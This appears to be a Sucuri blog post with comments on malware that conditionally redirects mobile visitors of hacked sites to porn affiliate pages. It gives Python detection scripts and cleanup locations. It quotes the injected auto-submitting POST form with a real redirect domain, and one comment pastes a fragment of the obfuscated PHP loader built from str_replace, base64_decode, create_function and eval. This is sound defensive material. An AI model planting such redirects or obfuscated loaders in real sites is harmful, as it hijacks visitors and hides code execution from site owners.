BaDoink Website Redirect – Malicious Redirections to Porn Websites on Mobile Devices

The past week has brought a large number of cases where compromised websites had hidden redirections to porn injected into their code. All the infections followed a similar pattern: they only targeted mobile devices. They are also highly conditional, which makes them challenging for webmasters to detect.

Let's take a minute to explain what is going on.

Conditional Redirects to Porn Websites Targeting Mobile Devices

Sounds complicated, but it isn't. If the visitor is coming from an iPad, iPhone, Android or other similar mobile device, the page is redirected to a random pornographic page. If the same person tries to visit the site again, nothing happens and the site loads properly. What gives?

1. The Word is “Conditional”

The malware injected on the website is intelligent. It stores the IP address for all the visitors that it redirects to the porn website. If you see the redirect once, it is likely that you won’t see it again for many hours. This makes the malware very difficult to detect and leads people to think it was a random error or that maybe they mistyped the URL.

2. Mobile-Only

This injection only redirects mobile browsers. Its targets seem to be iPhone, iPad, Android and a few other mobile OS browsers. For everyone else, the site looks clean and safe.

3. Mobile-only + Conditional = Very hard to detect

When you mix conditional with mobile-specific infections, you know it will be very difficult to detect. Yes, even SiteCheck has a hard time flagging it. It will flag the site once, but if the user forces a re-scan it will show the website as clean.

As you can imagine, it can be very confusing for the end user.

Browser-site injection

Rafael Capovilla, one of our Sr. Analysts, was the first to find and decipher how the injection is displayed in the browser. It is very sneaky, accomplishing its goal by utilizing a form like this one:

<form method=POST action="http://gridironservices.com/579205f64a3c6…php?q=b9f6606dcd0186725.." id="refoto_form" target="_top">

The domains vary (intelligenthometheater.com, gridironservices.com, etc.). By itself the form looks fine, but embedded alongside it you'll find this JavaScript code:

document.getElementById("refoto_form").submit();

This forces the POST to be submitted and the visitor redirected. At first glance both pieces look legitimate and will likely pass as clean for most (if not all) anti-virus and security tools.

As mentioned before, this only appears on Mobile devices and conditionally. You might be wondering why they would redirect to porn. As is often the case, it’s all about the money.

These pages are the first level in the redirection funnel. They proceed to push the user to affiliate/ads links, similar to these: httx://ads. mobiteasy.com/ or httx://www. instabang.com/tour/zinstabang, which pay the malware authors good money for every click.
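To see whether your own site is serving this injection, a webmaster can fetch a page the way a mobile browser would and look for a form that posts off-site and is auto-submitted by script. The following is an added example, not Sucuri's scanner; the iPhone User-Agent string, the sample HTML and the attacker-domain.invalid placeholder are all constructed here:

```python
import re
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlparse

# The injection only fires for mobile browsers, so fetch as one (constructed iPhone UA string).
MOBILE_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 "
             "(KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53")
# Matches getElementById("id").submit(), tolerating the odd spacing seen in the injected script.
SUBMIT_RE = re.compile(r"""getElementById\(\s*['"]([^'"]+)['"]\s*\)\s*\.\s*submit\s*\(""")

class _FormScriptParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.forms.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def find_forced_redirects(html, site_host):
    """Return [(form id, action)] for forms that post to another host and a script auto-submits.
    A relative action resolves to the site's own host, so it is never counted as a redirect."""
    p = _FormScriptParser()
    p.feed(html)
    auto_submitted = {fid for body in p.scripts for fid in SUBMIT_RE.findall(body)}
    return [(f["id"], f["action"]) for f in p.forms
            if f.get("id") in auto_submitted
            and (urlparse(f.get("action", "")).hostname or site_host).lower() != site_host.lower()]

def check_site(url, timeout=10):
    """Fetch your own page as a mobile browser and look for the forced POST redirect."""
    req = urllib.request.Request(url, headers={"User-Agent": MOBILE_UA})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        html = resp.read().decode("utf-8", "replace")
    return find_forced_redirects(html, urlparse(url).hostname or "")

# Constructed page (not captured from a real site) showing the pattern described in the post.
SAMPLE_HTML = """<form method=POST action="http://attacker-domain.invalid/x.php?q=b9f6" id="refoto_form" target="_top"></form>
<script>document.getElementById("refoto_form"). submit( );</script>
<form method=POST action="/wp-login.php" id="loginform"></form>
<script>document.getElementById("loginform").submit();</script>"""
```

Because the injection remembers the IPs it has already redirected, a clean result from an address that recently triggered it proves nothing; run `check_site` from an address the site has not been visited from in the last several hours.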

Removing the Porn Redirection

Shameless plug: if you have used SiteCheck and noticed the issue I mentioned above – showing dirty, then clean, or not showing at all – have no fear; this does happen from time to time and it's how the scanner works. Rest assured that our team is able to address the issue, and our internal scanners will catch it outright once configured.

To address the issue yourself, investigate these locations:

  • /index.php
  • /wp-config.php (if using WordPress)
  • /configuration.php (if using Joomla)
  • /wp-content/themes/yourtheme/functions.php (if using WordPress)

These are the four places where we see this injection being added. Note that it is highly encoded: you will have to look for any line that looks out of place, and it's best to engage your developer for help.
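Since the injection is heavily encoded and sits on a line that looks out of place, a static check for the usual markers (long single lines, long base64-like runs, random-looking variable names, eval/base64_decode/create_function calls, repeated str_replace used to strip junk out of a string) can narrow down what to hand to your developer. The following is an added example rather than Sucuri's tooling; it scans the four locations named above (covering every theme's functions.php, not just one), and the clean and injected index.php samples are constructed here, not taken from a real site:

```python
import re
from pathlib import Path

# PHP functions the injected code in this family assembles its payload from.
DANGEROUS_CALLS = ("eval", "base64_decode", "create_function", "gzinflate", "str_rot13")
CALL_RE = re.compile(r"\b(%s)\s*\(" % "|".join(DANGEROUS_CALLS))
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")
# $apXLsRB9qp1jAdt2-style names: 8+ characters mixing upper case, lower case and digits.
RANDOM_VAR = re.compile(r"\$(?=\w*\d)(?=\w*[a-z])(?=\w*[A-Z])[A-Za-z_]\w{7,}")
# The files the post names; each theme's functions.php is added in scan_site().
CANDIDATE_FILES = ("index.php", "wp-config.php", "configuration.php")

def suspicious_lines(text, max_len=400):
    """Return (line number, reasons) for lines that look like injected, encoded PHP.
    Two independent indicators are required so an ordinary long line is not flagged."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        reasons = []
        if len(line) > max_len:
            reasons.append(f"{len(line)} chars on a single line")
        calls = sorted(set(CALL_RE.findall(line)))
        if calls:
            reasons.append("calls " + ", ".join(calls))
        if BASE64_RUN.search(line):
            reasons.append("long base64-like run")
        if len(RANDOM_VAR.findall(line)) >= 3:
            reasons.append("random-looking variable names")
        if line.count("str_replace(") >= 2:  # junk-stripping trick that hides function names
            reasons.append("repeated str_replace")
        if len(reasons) >= 2:
            results.append((n, reasons))
    return results

def scan_site(root):
    """Scan the candidate files under a site root; returns {relative path: flagged lines}."""
    root = Path(root)
    targets = [root / f for f in CANDIDATE_FILES] + list(root.glob("wp-content/themes/*/functions.php"))
    return {str(p.relative_to(root)): hits for p in targets
            if p.is_file() and (hits := suspicious_lines(p.read_text(errors="replace")))}

# Constructed samples (not from a real site): a clean WordPress-style index.php and one with an
# injected line that strips junk out of a string to spell base64_decode, decodes, then evals.
CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire './wp-blog-header.php';\n"
INJECTED_INDEX = ("<?php function Q7kLpZ2xRt($a,$b,$c){return str_replace($a,$b,$c);} "
                  "$Hx9QwErT1yU='bZq8PaZq8PsZq8PeZq8P6Zq8P4Zq8P_Zq8PdZq8PeZq8PcZq8PoZq8PdZq8Pe'; "
                  "$Hx9QwErT1yU=Q7kLpZ2xRt('Zq8P','',$Hx9QwErT1yU); "
                  "$Kj3MnBvC5xZ=$Hx9QwErT1yU('" + "QUFB" * 40 + "'); eval($Kj3MnBvC5xZ); ?>\n"
                  + CLEAN_INDEX)
```

A flagged line is a lead, not a verdict: compare it against a pristine copy of the same file before deleting anything.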

Remember, the issue at the surface – the infection – is only the tip of the iceberg. If your website is infected you have to assume that the attackers have penetrated your defenses and have added controls that will allow them to continue to penetrate your environment. Be sure to look for backdoors.

If you have any questions, let us know. You can also engage us on Twitter at Sucuri Support or Sucuri Labs.

About Daniel Cid

Daniel B. Cid is the CTO & Founder of Sucuri and the founder of the open source OSSEC HIDS. His interests range from intrusion detection and log analysis (log-based intrusion detection) to web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid

  • Kyle Tripp

    A good way to find malicious code hidden in a configuration file is to download the original file again and do a diff against it; normally the only lines that are different are the database connection

  • George

    These exact symptoms happened to my WordPress site, so I re-installed WordPress, plugins & theme files (all latest versions), but the symptoms still happened. I've investigated the files index.php, wp-config.php & my theme's functions.php file but found nothing.

    When I scanned my site using the Sucuri scanner, it said there was malware, and it disclosed a "suspicious" script hosted externally. The script is an advertisement script from a Russian ad agency that bought banner ad placement on my site. So, I'm guessing this is where it's hidden. Am I right?

    • perezbox

      Possibly, hard to say without diving into the site itself. Are you an existing client?

      • George

        No, I’m not an existing client. But the scan is clean when I removed the ad code.

    • http://watwebdev.com/ David Watkinson

      I saw the same happen a long time ago when I used a smaller advertising network which still exists today. I won't name them. However, they only checked the ad when it was submitted. To save time, they didn't check revisions. So you would get an advert submission for something normal like a pair of shoes. After the advert was accepted, they would change it to malware. If the link and category are unchanged, then they don't re-authenticate it.
      Remove the ad code from your site, scan again, and if it is clean, report it to the ad agency. If you leave it on your site, it could be removed from Google to protect users.

      • George

        Yes, the scan is clean now when I removed the script. THANK YOU!!

        • http://watwebdev.com/ David Watkinson

          You’re welcome. Did the advertiser begin with the letter B?

  • http://www.sinelogix.com ketul

    Yeah. Great article that is very useful.

  • Henry

    For the longest time I have been scratching my head over this. Thanks to this post and others, I managed to solve my issue. I just want to share how I did it, to return the favor.

    In my case, I am using WordPress and there were two files that were affected.

    /index.php
    /wp-content/themes/YourWordpressTheme/index.php

    When you open the two files, you will see that there are a bunch of jumbled code inside, like

    “function POdaAm1RYOEnqZI5($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} function I8BRJNlvVcv8BKEn($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} function I0amzoGWejZvWj1qMXXyLvu($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} $apXLsRB9qp1jAdt2 = ‘bljoeka8eAj6wpeJaljoeka8eAj6wpeJsljoeka8eAj6wpeJeljoeka8eAj6wpeJ6ljoeka8eAj6wpeJ4ljoeka8eAj6wpeJ_ljoeka8eAj6wpeJdljoeka8eAj6wpeJeljoeka8eAj6wpeJcljoeka8eAj6wpeJoljoeka8eAj6wpeJdljoeka8eAj6wpeJe’; $apXLsRB9qp1jAdt2 = I0amzoGWejZvWj1qMXXyLvu(‘ljoeka8eAj6wpeJ’,”,$apXLsRB9qp1jAdt2); $WETSqAfZOqV73vT = ‘cOuwZMdqMtFDD6HrOuwZMdqMtFDD6HeOuwZMdqMtFDD6HaOuwZMdqMtFDD6HtOuwZMdqMtFDD6HeOuwZMdqMtFDD6H_OuwZMdqMtFDD6HfOuwZMdqMtFDD6HuOuwZMdqMtFDD6HnOuwZMdqMtFDD6HcOuwZMdqMtFDD6HtOuwZMdqMtFDD6HiOuwZMdqMtFDD6HoOuwZMdqMtFDD6Hn’; $WETSqAfZOqV73vT = I0amzoGWejZvWj1qMXXyLvu(‘OuwZMdqMtFDD6H’,”,$WETSqAfZOqV73vT); $JsmNP8kuxuqpV = ‘gYI6cMgcLlDVegYI6cMgcLlDVvgYI6cMgcLlDVagYI6cMgcLlDVl’; $JsmNP8kuxuqpV = I0amzoGWejZvWj1qMXXyLvu(‘gYI6cMgcLlDV’,”,$JsmNP8kuxuqpV); $D4gkz02Pq8F5pq2iLMd3ZQ = ‘$ynk5tMJWc7CSwVHPzj52BAPu’; $YX13lmjB70wdaV33Ak25fhm = $WETSqAfZOqV73vT($D4gkz02Pq8F5pq2iLMd3ZQ,$JsmNP8kuxuqpV.’(‘.$apXLsRB9qp1jAdt2.’(‘.$D4gkz02Pq8F5pq2iLMd3ZQ.’));’); $YX13lmjB70wdaV33Ak25fhm(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhTW1oaFlteGFNVmRVVGxOalIwbDVUbGRh

    This is just a portion of it, but basically you should be able to see the "<?php" followed by "function" or "str_replace" and a lot of the gibberish code.

    What I did was just to remove all the gibberish and have only the original stuff left. For WordPress index.php, the original file is

    ——————————

    ——————————

    Make sure the “” is at the end. Otherwise you will have errors going to your website url.

    I also made sure my index.php and .htaccess file permissions are 644 instead of 755. Not sure if this will help but I think it's probably more secure.

    Hope this helps others :)

    Cheers,
    Henry

    • Nick

      OK, so you removed the bad code from your site.

      What did you do to isolate the _cause_ of the compromise?

      Or is your site just sitting there waiting to get shat all over again?

  • Pam

    How do you fix this problem? I am not that computer (iPad) savvy. Can you do it yourself at home? How? Thanks